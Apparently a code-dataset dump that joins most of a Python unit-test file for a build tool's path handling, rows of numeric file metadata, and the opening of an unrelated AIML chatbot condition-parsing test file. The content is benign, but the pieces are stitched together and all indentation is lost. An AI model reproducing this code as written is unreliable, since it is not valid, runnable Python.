self.assertEqual(p.suffix, '/foo/bar')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, True)
self.assertEqual(p.has_drive(), False)
p = self.Path('/foo/bar', path.InstallRoot.bindir, True)
self.assertEqual(p.suffix, '/foo/bar')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, True)
self.assertEqual(p.has_drive(), False)
self.assertRaises(ValueError, self.Path, 'foo/bar', path.Root.srcdir,
True)
def test_construct_relative(self):
for base in (self.Path('foo', path.Root.srcdir),
self.Path('/foo', path.Root.absolute),
self.Path('foo', path.InstallRoot.bindir, True)):
p = self.Path('bar', base)
self.assertEqual(p.suffix, base.suffix + '/bar')
self.assertEqual(p.root, base.root)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, base.destdir)
self.assertEqual(p.has_drive(), False)
p = self.Path('bar/', base)
self.assertEqual(p.suffix, base.suffix + '/bar')
self.assertEqual(p.root, base.root)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, base.destdir)
self.assertEqual(p.has_drive(), False)
p = self.Path('..', base)
self.assertEqual(p.suffix, base.suffix.replace('foo', ''))
self.assertEqual(p.root, base.root)
self.assertEqual(p.directory, True)
self.assertEqual(p.destdir, base.destdir)
self.assertEqual(p.has_drive(), False)
p = self.Path('bar', base, True)
self.assertEqual(p.suffix, base.suffix + '/bar')
self.assertEqual(p.root, base.root)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, True)
self.assertEqual(p.has_drive(), False)
p = self.Path('bar', base, False)
self.assertEqual(p.suffix, base.suffix + '/bar')
self.assertEqual(p.root, base.root)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
p = self.Path('/bar', base)
self.assertEqual(p.suffix, '/bar')
self.assertEqual(p.root, path.Root.absolute)
self.assertEqual(p.directory, False)
self.assertEqual(p.destdir, False)
self.assertEqual(p.has_drive(), False)
if base.root != path.Root.absolute:
self.assertRaises(ValueError, self.Path, '../..', base)
def test_ensure(self):
self.assertPathEqual(self.Path.ensure('foo'), self.Path('foo'))
self.assertPathEqual(self.Path.ensure('foo', path.Root.srcdir),
self.Path('foo', path.Root.srcdir))
self.assertPathEqual(self.Path.ensure('foo', directory=True),
self.Path('foo/'))
self.assertPathEqual(
self.Path.ensure('foo', path.InstallRoot.bindir, True),
self.Path('foo', path.InstallRoot.bindir, True)
)
p = self.Path('foo')
self.assertIs(self.Path.ensure(p), p)
self.assertIs(self.Path.ensure(p, path.Root.srcdir), p)
self.assertIs(self.Path.ensure(p, path.InstallRoot.bindir, True), p)
self.assertRaises(ValueError, self.Path.ensure, p, path.Root.srcdir,
strict=True)
self.assertRaises(ValueError, self.Path.ensure, '/foo',
path.Root.srcdir, strict=True)
base = self.Path('base')
self.assertPathEqual(self.Path.ensure('foo', base),
self.Path('base/foo'))
self.assertPathEqual(self.Path.ensure('foo', base),
self.Path('base/foo'))
self.assertPathEqual(self.Path.ensure('/foo', base), self.Path('/foo'))
self.assertIs(self.Path.ensure(p, base), p)
self.assertRaises(ValueError, self.Path.ensure,
self.Path('foo', path.Root.srcdir), strict=True)
self.assertRaises(ValueError, self.Path.ensure, '/foo', strict=True)
def test_equality(self):
self.assertTrue(self.Path('a', path.Root.srcdir) ==
self.Path('a', path.Root.srcdir))
self.assertFalse(self.Path('a', path.Root.srcdir) !=
self.Path('a', path.Root.srcdir))
self.assertTrue(self.Path('a', path.InstallRoot.bindir, True) ==
self.Path('a', path.InstallRoot.bindir, True))
self.assertFalse(self.Path('a', path.InstallRoot.bindir, True) !=
self.Path('a', path.InstallRoot.bindir, True))
self.assertTrue(self.Path('a', path.Root.srcdir) ==
self.Path('a/', path.Root.srcdir))
self.assertFalse(self.Path('a', path.Root.srcdir) !=
self.Path('a/', path.Root.srcdir))
self.assertFalse(self.Path('a', path.Root.srcdir) ==
self.Path('a', path.Root.builddir))
self.assertTrue(self.Path('a', path.Root.srcdir) !=
self.Path('a', path.Root.builddir))
self.assertFalse(self.Path('a', path.Root.srcdir) ==
self.Path('b', path.Root.srcdir))
self.assertTrue(self.Path('a', path.Root.srcdir) !=
self.Path('b', path.Root.srcdir))
self.assertFalse(self.Path('a', path.InstallRoot.bindir, True) ==
self.Path('a', path.InstallRoot.bindir, False))
self.assertTrue(self.Path('a', path.InstallRoot.bindir, True) !=
self.Path('a', path.InstallRoot.bindir, False))
winpath = target.platform_info('winnt').Path
linuxpath = target.platform_info('linux').Path
self.assertFalse(winpath('a') == linuxpath('a'))
self.assertTrue(winpath('a') != linuxpath('a'))
self.assertFalse(self.Path('a', path.Root.srcdir) == 'a')
self.assertTrue(self.Path('a', path.Root.srcdir) != 'a')
def test_cross(self):
for name in ('winnt', 'linux'):
platform = target.platform_info(name)
env = MockEnv(platform)
p = self.Path('foo/bar', path.Root.srcdir)
self.assertPathEqual(p.cross(env),
platform.Path('foo/bar', path.Root.srcdir))
p = self.Path('foo/bar/', path.Root.srcdir)
self.assertPathEqual(p.cross(env),
platform.Path('foo/bar/', path.Root.srcdir))
p = self.Path('foo/bar', path.InstallRoot.bindir, destdir=True)
self.assertPathEqual(
p.cross(env),
platform.Path('foo/bar', path.InstallRoot.bindir)
)
def test_as_directory(self):
f = self.Path('foo', path.Root.srcdir)
d = self.Path('foo/', path.Root.srcdir)
self.assertPathEqual(f.as_directory(), d)
self.assertIs(d.as_directory(), d)
def test_parent(self):
p = self.Path('foo/bar', path.Root.srcdir)
self.assertPathEqual(p.parent(), self.Path('foo/', path.Root.srcdir))
p = self.Path('bar', path.Root.srcdir)
self.assertPathEqual(p.parent(), self.Path('./', path.Root.srcdir))
p = self.Path('', path.Root.srcdir)
self.assertRaises(ValueError, p.parent)
p = self.Path('foo/bar', path.InstallRoot.bindir, True)
self.assertPathEqual(
p.parent(), self.Path('foo/', path.InstallRoot.bindir, True)
)
def test_append(self):
Root = path.Root
p = self.Path('foo', Root.srcdir)
self.assertPathEqual(p.append('bar'),
self.Path('foo/bar', Root.srcdir))
self.assertPathEqual(p.append('bar/baz'),
self.Path('foo/bar/baz', Root.srcdir))
self.assertPathEqual(p.append(r'bar\baz'),
self.Path('foo/bar/baz', Root.srcdir))
self.assertPathEqual(p.append('.'), self.Path('foo/', Root.srcdir))
self.assertPathEqual(p.append('..'), self.Path('', Root.srcdir))
self.assertPathEqual(p.append('../bar'), self.Path('bar', Root.srcdir))
self.assertPathEqual(p.append(r'..\bar'),
self.Path('bar', Root.srcdir))
self.assertPathEqual(p.append('bar/'),
self.Path('foo/bar/', Root.srcdir))
self.assertPathEqual(p.append('./'), self.Path('foo/', Root.srcdir))
self.assertPathEqual(p.append('/bar'),
self.Path('/bar', Root.absolute))
self.assertPathEqual(p.append('C:/bar'),
self.Path('C:/bar', Root.absolute))
self.assertPathEqual(p.append(r'C:\bar'),
self.Path('C:/bar', Root.absolute))
self.assertPathEqual(p.append('//server/mount/bar'),
self.Path('//server/mount/bar', Root.absolute))
self.assertPathEqual(p.append(r'\\server\mount\bar'),
self.Path('//server/mount/bar', Root.absolute))
p = self.Path('foo', path.InstallRoot.bindir, True)
self.assertPathEqual(
p.append('bar'),
self.Path('foo/bar', path.InstallRoot.bindir, True)
)
p = self.Path('foo', Root.srcdir)
self.assertRaises(ValueError, p.append, '../..')
def test_ext(self):
p = self.Path('foo.txt', path.Root.srcdir)
self.assertEqual(p.ext(), '.txt')
def test_addext(self):
p = self.Path('foo', path.Root.srcdir)
self.assertPathEqual(p.addext('.txt'),
self.Path('foo.txt', path.Root.srcdir))
p = self.Path('foo/', path.Root.srcdir)
self.assertPathEqual(p.addext('.txt'),
self.Path('foo.txt/', path.Root.srcdir))
p = self.Path('foo', path.InstallRoot.bindir, True)
self.assertPathEqual(
p.addext('.txt'),
self.Path('foo.txt', path.InstallRoot.bindir, True)
)
def test_stripext(self):
p = self.Path('foo.txt', path.Root.srcdir)
self.assertPathEqual(p.stripext(), self.Path('foo', path.Root.srcdir))
p = self.Path('foo.txt', path.Root.srcdir)
self.assertPathEqual(p.stripext('.cpp'),
self.Path('foo.cpp', path.Root.srcdir))
p = self.Path('foo.txt/', path.Root.srcdir)
self.assertPathEqual(p.stripext(),
self.Path('foo/', path.Root.srcdir))
p = self.Path('foo.txt/', path.Root.srcdir)
self.assertPathEqual(p.stripext('.cpp'),
self.Path('foo.cpp/', path.Root.srcdir))
p = self.Path('foo', path.Root.srcdir)
self.assertPathEqual(p.stripext(), self.Path('foo', path.Root.srcdir))
p = self.Path('foo', path.Root.srcdir)
self.assertPathEqual(p.stripext('.cpp'),
self.Path('foo.cpp', path.Root.srcdir))
p = self.Path('foo.txt', path.InstallRoot.bindir, True)
self.assertPathEqual(p.stripext(),
self.Path('foo', path.InstallRoot.bindir, True))
def test_splitleaf(self):
p = self.Path('foo/bar/baz', path.Root.srcdir)
par, leaf = p.splitleaf()
self.assertPathEqual(par, self.Path('foo/bar/', path.Root.srcdir))
self.assertEqual(leaf, 'baz')
def test_split(self):
p = self.Path('', path.Root.srcdir)
self.assertEqual(p.split(), [])
p = self.Path('foo/bar/baz', path.Root.srcdir)
self.assertEqual(p.split(), ['foo', 'bar', 'baz'])
def test_basename(self):
p = self.Path('foo/bar', path.Root.srcdir)
self.assertEqual(p.basename(), 'bar')
def test_relpath_relative(self):
p = self.Path('foo/bar', path.Root.srcdir)
self.assertEqual(p.relpath(p), '.')
self.assertEqual(p.relpath(p, 'pre'), 'pre')
self.assertEqual(p.relpath(p, localize=False), '.')
self.assertEqual(p.relpath(p, 'pre', False), 'pre')
self.assertEqual(p.relpath(self.Path('foo', path.Root.srcdir)), 'bar')
self.assertEqual(p.relpath(self.Path('foo', path.Root.srcdir), 'pre'),
self.ospath.join('pre', 'bar'))
self.assertEqual(p.relpath(self.Path('foo', path.Root.srcdir),
localize=False), 'bar')
self.assertEqual(p.relpath(self.Path('foo', path.Root.srcdir), 'pre',
False), 'pre/bar')
self.assertEqual(p.relpath(self.Path('baz', path.Root.srcdir)),
self.ospath.join('..', 'foo', 'bar'))
self.assertEqual(p.relpath(self.Path('baz', path.Root.srcdir), 'pre'),
self.ospath.join('pre', '..', 'foo', 'bar'))
self.assertEqual(p.relpath(self.Path('baz', path.Root.srcdir),
localize=False), '../foo/bar')
self.assertEqual(p.relpath(self.Path('baz', path.Root.srcdir), 'pre',
False), 'pre/../foo/bar')
self.assertEqual(p.relpath(self.Path('.', path.Root.srcdir)),
self.ospath.join('foo', 'bar'))
self.assertEqual(p.relpath(self.Path('.', path.Root.srcdir), 'pre'),
self.ospath.join('pre', 'foo', 'bar'))
self.assertEqual(p.relpath(self.Path('.', path.Root.srcdir),
localize=False), 'foo/bar')
self.assertEqual(p.relpath(self.Path('.', path.Root.srcdir), 'pre',
False), 'pre/foo/bar')
p = self.Path('.', path.Root.srcdir)
self.assertEqual(p.relpath(path.Path('foo', path.Root.srcdir)), '..')
self.assertEqual(p.relpath(path.Path('foo', path.Root.srcdir), 'pre'),
self.ospath.join('pre', '..'))
self.assertEqual(p.relpath(path.Path('foo', path.Root.srcdir),
localize=False), '..')
self.assertEqual(p.relpath(path.Path('foo', path.Root.srcdir), 'pre',
False), 'pre/..')
p = self.Path('foo/bar', path.Root.srcdir)
self.assertRaises(
ValueError, lambda: p.relpath(self.Path('foo', path.Root.builddir))
)
def test_relpath_absolute(self):
p = self.Path('/foo/bar')
self.assertEqual(p.relpath(self.Path('start')),
self.ospath.join(self.ospath.sep, 'foo', 'bar'))
self.assertEqual(p.relpath(self.Path('start'), 'pre'),
self.ospath.join(self.ospath.sep, 'foo', 'bar'))
self.assertEqual(p.relpath(self.Path('start'), localize=False),
'/foo/bar')
self.assertEqual(p.relpath(self.Path('start'), 'pre', False),
'/foo/bar')
self.assertEqual(p.relpath(self.Path('/start')),
self.ospath.join(self.ospath.sep, 'foo', 'bar'))
self.assertEqual(p.relpath(self.Path('/start'), 'pre'),
self.ospath.join(self.ospath.sep, 'foo', 'bar'))
self.assertEqual(p.relpath(self.Path('/start'), localize=False),
'/foo/bar')
self.assertEqual(p.relpath(self.Path('/start'), 'pre', False),
'/foo/bar')
p = self.Path(r'C:\foo\bar')
self.assertEqual(
p.relpath(self.Path(r'C:\start')),
'C:' + self.ospath.sep + self.ospath.join('foo', 'bar')
)
self.assertEqual(
p.relpath(self.Path(r'C:\start'), 'pre'),
'C:' + self.ospath.sep + self.ospath.join('foo', 'bar')
)
self.assertEqual(p.relpath(self.Path(r'C:\start'), localize=False),
'C:/foo/bar')
self.assertEqual(p.relpath(self.Path(r'C:\start'), 'pre', False),
'C:/foo/bar')
def test_reroot(self):
p = self.Path('foo/bar', path.Root.srcdir)
self.assertPathEqual(p.reroot(path.Root.builddir),
self.Path('foo/bar', path.Root.builddir))
p = self.Path('foo/bar/', path.Root.srcdir)
self.assertPathEqual(p.reroot(path.Root.builddir),
self.Path('foo/bar/', path.Root.builddir))
p = self.Path('foo/bar', path.InstallRoot.bindir, True)
self.assertPathEqual(
p.reroot(path.InstallRoot.libdir),
self.Path('foo/bar', path.InstallRoot.libdir, True)
)
def test_to_json(self):
p = self.Path('foo', path.Root.srcdir)
self.assertEqual(p.to_json(), ['foo', 'srcdir', False])
p = self.Path('foo/', path.Root.srcdir)
self.assertEqual(p.to_json(), ['foo/', 'srcdir', False])
p = self.Path('./', path.Root.srcdir)
self.assertEqual(p.to_json(), ['./', 'srcdir', False])
p = self.Path('/', path.Root.absolute)
self.assertEqual(p.to_json(), ['/', 'absolute', False])
p = self.Path('foo', path.InstallRoot.bindir, True)
self.assertEqual(p.to_json(), ['foo', 'bindir', True])
def test_from_json(self):
p = self.Path.from_json(['foo', 'srcdir', False])
self.assertPathEqual(p, self.Path('foo', path.Root.srcdir))
p = self.Path.from_json(['foo', 'bindir', True])
self.assertPathEqual(
p, self.Path('foo', path.InstallRoot.bindir, True)
)
def test_realize_srcdir(self):
p = self.Path('foo', path.Root.srcdir)
self.assertEqual(p.realize(path_variables),
self.ospath.join('$(srcdir)', 'foo'))
self.assertEqual(p.realize(path_variables, executable=True),
self.ospath.join('$(srcdir)', 'foo'))
p = self.Path('foo/bar', path.Root.srcdir)
self.assertEqual(p.realize(path_variables),
self.ospath.join('$(srcdir)', 'foo', 'bar'))
self.assertEqual(p.realize(path_variables, executable=True),
self.ospath.join('$(srcdir)', 'foo', 'bar'))
def test_realize_builddir(self):
p = self.Path('foo', path.Root.builddir)
self.assertEqual(p.realize(path_variables), 'foo')
self.assertEqual(p.realize(path_variables, executable=True),
self.ospath.join('.', 'foo'))
p = self.Path('foo/bar', path.Root.builddir)
self.assertEqual(p.realize(path_variables),
self.ospath.join('foo', 'bar'))
self.assertEqual(p.realize(path_variables, executable=True),
self.ospath.join('foo', 'bar'))
def test_realize_absolute(self):
ospath = self.ospath
p = self.Path('/foo/bar', path.Root.builddir)
self.assertEqual(p.realize(path_variables),
ospath.join(ospath.sep, 'foo', 'bar'))
self.assertEqual(p.realize(path_variables, executable=True),
ospath.join(ospath.sep, 'foo', 'bar'))
p = self.Path(r'C:\foo\bar', path.Root.builddir)
self.assertEqual(p.realize(path_variables),
'C:' + ospath.sep + ospath.join('foo', 'bar'))
self.assertEqual(p.realize(path_variables, executable=True),
'C:' + ospath.sep + ospath.join('foo', 'bar'))
def test_realize_srcdir_empty(self):
p = self.Path('', path.Root.srcdir)
self.assertEqual(p.realize(path_variables), '$(srcdir)')
self.assertEqual(p.realize(path_variables, executable=True),
'$(srcdir)')
def test_realize_builddir_empty(self):
p = self.Path('', path.Root.builddir)
self.assertEqual(p.realize(path_variables), '.')
self.assertEqual(p.realize(path_variables, executable=True), '.')
def test_realize_destdir(self):
path_vars_with_destdir = path_variables.copy()
path_vars_with_destdir[path.DestDir.destdir] = '$(destdir)'
p = self.Path('foo', path.InstallRoot.bindir, True)
self.assertEqual(p.realize(path_variables),
self.ospath.join('$(bindir)', 'foo'))
self.assertEqual(p.realize(path_vars_with_destdir),
self.ospath.join('$(destdir)$(bindir)', 'foo'))
p = self.Path('/foo', path.Root.absolute, True)
self.assertEqual(p.realize(path_variables),
self.ospath.join(self.ospath.sep, 'foo'))
self.assertEqual(p.realize(path_vars_with_destdir),
self.ospath.join('$(destdir)', 'foo'))
def test_realize_no_variable_sep(self):
p = self.Path('foo', path.Root.srcdir)
self.assertEqual(p.realize(path_variables, variable_sep=False),
'$(srcdir)foo')
p = self.Path('foo/bar', path.Root.srcdir)
self.assertEqual(p.realize(path_variables, variable_sep=False),
self.ospath.join('$(srcdir)foo', 'bar'))
def test_string(self):
ospath = self.ospath
paths = {path.Root.srcdir: self.Path('/srcdir', path.Root.absolute)}
p = self.Path('/foo/bar', path.Root.absolute)
self.assertEqual(p.string(), ospath.join(ospath.sep, 'foo', 'bar'))
p = self.Path('foo/bar', path.Root.srcdir)
self.assertEqual(
p.string(paths), ospath.join(ospath.sep, 'srcdir', 'foo', 'bar')
)
p = self.Path('.', path.Root.srcdir)
self.assertEqual(p.string(paths), ospath.join(ospath.sep, 'srcdir'))
def test_hash(self):
d = {self.Path('.', path.Root.srcdir),
self.Path('.', path.Root.builddir),
self.Path('foo', path.Root.srcdir),
self.Path('bar', path.InstallRoot.bindir),
self.Path('bar', path.InstallRoot.bindir, destdir=True)}
self.assertEqual(len(d), 5)
def test_add(self):
p = self.Path('foo/bar', path.Root.srcdir)
result = p + 'baz'
self.assertEqual(type(result), jbos)
self.assertEqual(result.bits, (p, 'baz'))
result = 'baz' + p
self.assertEqual(type(result), jbos)
self.assertEqual(result.bits, ('baz', p))
class TestAbsPath(TestCase):
def test_abspath(self):
with mock.patch('os.getcwd', return_value=r'/base'):
self.assertPathEqual(path.abspath('foo'),
path.Path('/base/foo', path.Root.absolute))
self.assertPathEqual(path.abspath('/foo/bar'),
path.Path('/foo/bar', path.Root.absolute))
self.assertPathEqual(path.abspath('foo/'),
path.Path('/base/foo/', path.Root.absolute))
self.assertPathEqual(path.abspath('/foo/bar/'),
path.Path('/foo/bar/', path.Root.absolute))
self.assertPathEqual(path.abspath('foo', directory=True),
path.Path('/base/foo/', path.Root.absolute))
self.assertRaises(ValueError, path.abspath, 'foo/',
directory=False)
def test_drive(self):
with mock.patch('os.getcwd', return_value=r'C:\base'):
self.assertPathEqual(path.abspath('foo'),
path.Path('C:/base/foo', path.Root.absolute))
self.assertPathEqual(path.abspath('/foo/bar'),
path.Path('C:/foo/bar', path.Root.absolute))
self.assertPathEqual(path.abspath('D:/foo/bar'),
path.Path('D:/foo/bar', path.Root.absolute))
def test_rel_drive(self):
with mock.patch('os.getcwd', return_value=r'C:\base'):
self.assertPathEqual(path.abspath('foo', absdrive=False),
path.Path('/base/foo', path.Root.absolute))
self.assertPathEqual(path.abspath('/foo/bar', absdrive=False),
path.Path('/foo/bar', path.Root.absolute))
self.assertPathEqual(path.abspath('D:/foo/bar', absdrive=False),
path.Path('D:/foo/bar', path.Root.absolute))
class TestCommonPrefix(TestCase):
def test_empty(self):
self.assertEqual(path.commonprefix([]), None)
def test_single(self):
p = path.Path('foo/bar')
self.assertPathEqual(path.commonprefix([p]), p)
def test_multi_same(self):
p = path.Path('foo/bar')
self.assertPathEqual(path.commonprefix([p, p]), p)
def test_multi_partial_match(self):
p = path.Path('foo/bar')
q = path.Path('foo/baz')
self.assertPathEqual(path.commonprefix([p, q]), path.Path('foo/'))
def test_multi_subset(self):
p = path.Path('foo/bar')
q = path.Path('foo/bar/baz')
self.assertPathEqual(path.commonprefix([p, q]), path.Path('foo/bar/'))
def test_multi_no_match(self):
p = path.Path('foo/bar')
q = path.Path('baz/quux')
self.assertPathEqual(path.commonprefix([p, q]), path.Path(''))
class TestUniqueTrees(TestCase):
def test_empty(self):
self.assertEqual(path.uniquetrees([]), [])
def test_disjoint(self):
a = path.Path('a')
bcd = path.Path('b/c/d')
ef = path.Path('e/f')
self.assertEqual(path.uniquetrees([bcd, ef, a]), [a, bcd, ef])
def test_common_base(self):
a = path.Path('a')
ab = path.Path('a/b')
abc = path.Path('a/b/c')
aca = path.Path('a/c/a')
self.assertEqual(path.uniquetrees([abc, aca, a, ab]), [a])
def test_mixed(self):
ab = path.Path('a/b')
abc = path.Path('a/b/c')
ad = path.Path('a/d')
cab = path.Path('c/a/b')
self.assertEqual(path.uniquetrees([abc, ab, cab, ad]), [ab, ad, cab])
def test_different_roots(self):
sab = path.Path('a/b', path.Root.srcdir)
sabc = path.Path('a/b/c', path.Root.srcdir)
bab = path.Path('a/b', path.Root.builddir)
babc = path.Path('a/b/c', path.Root.builddir)
self.assertEqual(path.uniquetrees([sabc, bab, babc, sab]), [sab, bab])
class TestWrappedOsPath(TestCase):
def test_wrap(self):
mocked = mock.MagicMock(return_value=True)
mocked.__name__ = 'foo'
f = path._wrap_ospath(mocked)
f(path.Path('/foo/bar'))
mocked.assert_called_once_with(os.path.join(os.path.sep, 'foo', 'bar'))
class TestSamefile(TestCase):
def test_samefile(self):
with mock.patch('os.path.samefile', lambda x, y: x == y, create=True):
self.assertEqual(path.samefile(path.Path('/foo/bar'),
path.Path('/foo/bar')), True)
class TestListdir(TestCase):
path_vars = {path.Root.builddir: None}
def test_listdir(self):
with mock_filesystem():
dirs, nondirs = path.listdir(path.Path('.'), self.path_vars)
self.assertPathListEqual(dirs, [path.Path('dir/')])
self.assertPathListEqual(nondirs, [path.Path('file.cpp')])
def test_not_found(self):
def mock_listdir(path):
raise OSError()
with mock.patch('os.listdir', mock_listdir):
dirs, nondirs = path.listdir(path.Path('.'), self.path_vars)
self.assertEqual(dirs, [])
self.assertEqual(nondirs, [])
class TestWalk(TestCase):
path_vars = {path.Root.builddir: None}
def test_exists(self):
Path = path.Path
with mock_filesystem():
self.assertEqual(list(path.walk(Path('.'), self.path_vars)), [
(Path('.'), [Path('dir')], [Path('file.cpp')]),
(Path('dir'), [Path('dir/sub')], [Path('dir/file2.txt')]),
(Path('dir/sub'), [], []),
])
def test_not_exists(self):
with mock.patch('bfg9000.path.exists', return_value=False):
self.assertEqual(list(path.walk(path.Path('.'), self.path_vars)),
[])
def test_link(self):
def mock_islink(path, variables=None):
return path.basename() == 'dir'
Path = path.Path
with mock_filesystem(islink=mock_islink):
self.assertEqual(list(path.walk(Path('.'), self.path_vars)), [
(Path('.'), [Path('dir')], [Path('file.cpp')]),
])
class TestPushd(TestCase):
def test_basic(self):
with mock.patch('os.getcwd', return_value='cwd'), \
mock.patch('os.chdir') as os_chdir: # noqa
with path.pushd('foo'):
self.assertEqual(os_chdir.mock_calls, [mock.call('foo')])
self.assertEqual(os_chdir.mock_calls, [
mock.call('foo'), mock.call('cwd')
])
def test_makedirs(self):
with mock.patch('os.makedirs') as os_makedirs, \
mock.patch('os.getcwd', return_value='cwd'), \
mock.patch('os.chdir') as os_chdir: # noqa
with path.pushd('foo', makedirs=True):
self.assertEqual(os_makedirs.mock_calls, [
mock.call('foo', 0o777, False)
])
self.assertEqual(os_chdir.mock_calls, [mock.call('foo')])
self.assertEqual(os_chdir.mock_calls, [
mock.call('foo'), mock.call('cwd')
])
def test_exception(self):
with mock.patch('os.getcwd', return_value='cwd'), \
mock.patch('os.chdir') as os_chdir: # noqa
with self.assertRaises(ValueError):
with path.pushd('foo'):
self.assertEqual(os_chdir.mock_calls, [mock.call('foo')])
raise ValueError('uh oh!')
self.assertEqual(os_chdir.mock_calls, [
mock.call('foo'), mock.call('cwd')
])
| 42.166848
| 79
| 0.569349
| 4,599
| 38,667
| 4.737987
| 0.04501
| 0.165902
| 0.158605
| 0.071868
| 0.849564
| 0.825103
| 0.792015
| 0.761313
| 0.716521
| 0.672602
| 0
| 0.001236
| 0.267489
| 38,667
| 916
| 80
| 42.212882
| 0.768077
| 0.000491
| 0
| 0.478203
| 0
| 0
| 0.070698
| 0.002277
| 0
| 0
| 0
| 0
| 0.455746
| 1
| 0.083223
| false
| 0
| 0.010568
| 0.005284
| 0.117569
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9377cff855a10075ed0259629d2f102f9e41ec33
| 87,457
|
py
|
Python
|
dialogue-engine/test/programytest/parser/template/graph_tests/test_condition.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 104
|
2020-03-30T09:40:00.000Z
|
2022-03-06T22:34:25.000Z
|
dialogue-engine/test/programytest/parser/template/graph_tests/test_condition.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 25
|
2020-06-12T01:36:35.000Z
|
2022-02-19T07:30:44.000Z
|
dialogue-engine/test/programytest/parser/template/graph_tests/test_condition.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 10
|
2020-04-02T23:43:56.000Z
|
2021-05-14T13:47:01.000Z
|
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.condition import TemplateConditionNode
from programy.parser.template.nodes.condition import TemplateConditionListItemNode
from programy.parser.template.nodes.condition import TemplateConditionVariable
from programytest.parser.template.graph_tests.graph_test_client import TemplateGraphTestClient
class TemplateGraphConditionTests(TemplateGraphTestClient):
##################################################################################################################
# Block (type1)
#
def test_condition_template_block_typename_attributes(self):
template = ET.fromstring("""
<template>
<condition name="aname" value="avalue">
X
<random>
<li>1</li>
<li>2</li>
</random>
Y
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.GLOBAL)
self.assertFalse(template_node.loop)
self.assertEqual(len(template_node.children), 3)
def test_condition_template_block_typedata_attributes(self):
template = ET.fromstring("""
<template>
<condition data="aname" value="avalue">
X
<random>
<li>1</li>
<li>2</li>
</random>
Y
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertEqual(template_node.var_type, TemplateConditionVariable.DATA)
self.assertFalse(template_node.loop)
self.assertEqual(len(template_node.children), 3)
def test_condition_template_block_typevar_attributes(self):
template = ET.fromstring("""
<template>
<condition var="aname" value="avalue">
X
<random>
<li>1</li>
<li>2</li>
</random>
Y
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.LOCAL)
self.assertEqual(len(template_node.children), 3)
def test_condition_template_block_bot_attributes(self):
template = ET.fromstring("""
<template>
<condition bot="aname" value="avalue">
X
<random>
<li>1</li>
<li>2</li>
</random>
Y
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
self.assertIsInstance(template_node.value, TemplateNode)
self.assertFalse(template_node.loop)
self.assertEqual(template_node.var_type, TemplateConditionVariable.BOT)
self.assertEqual(len(template_node.children), 3)
def test_condition_template_block_typename_name_attr_val_child(self):
template = ET.fromstring("""
<template>
<condition name="aname">
<value>avalue</value>
X
</condition>
</template>
""")
ast = self._graph.parse_template_expression(template)
self.assertIsNotNone(ast)
self.assertIsInstance(ast, TemplateNode)
self.assertIsNotNone(ast.children)
template_node = ast.children[0]
self.assertIsNotNone(template_node)
self.assertIsInstance(template_node, TemplateConditionNode)
self.assertEqual(template_node.name.children[0].word, "aname")
